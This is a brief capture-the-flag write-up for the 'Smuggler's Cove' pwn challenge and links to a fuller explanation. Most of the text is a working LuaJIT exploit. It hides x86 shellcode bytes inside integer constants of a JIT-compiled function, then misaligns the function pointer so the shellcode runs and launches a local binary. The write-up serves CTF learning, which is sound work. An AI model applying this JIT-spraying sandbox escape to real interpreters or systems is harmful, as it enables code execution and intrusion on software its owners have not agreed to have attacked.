Tags: lua pwn escape shellcode sandbox luajit jit 

Rating: 5.0

Smuggler's Cove was a pwn challenge built on a LuaJIT-based Lua interpreter, combined with a pointer corruption used to misalign a JIT-compiled function.
Check out the original writeup for a full explanation.

Exploit:
```lua
function f(i)
    local s="./dig_up_the_loot\0spot\0the\0marks\0x\0"
    if i == 0x50f583b6a5e5457LL then print(i) end
    if i == 0x3eb5104c18366LL then print(i) end
    if i == 0x3eb5105c18366LL then print(i) end
    if i == 0x3eb519090006aLL then print(i) end
    if i == 0x3eb12c183665fLL then print(i) end
    if i == 0x2eb905160c18366LL then print(i) end
    if i == 0x3eb5106c18366LL then print(i) end
end
f(0)
f(0)
cargo(f,0xd)
f(0)
```

Original writeup (https://0xten.gitbook.io/public/defcon/2022/quals/smugglers-cove).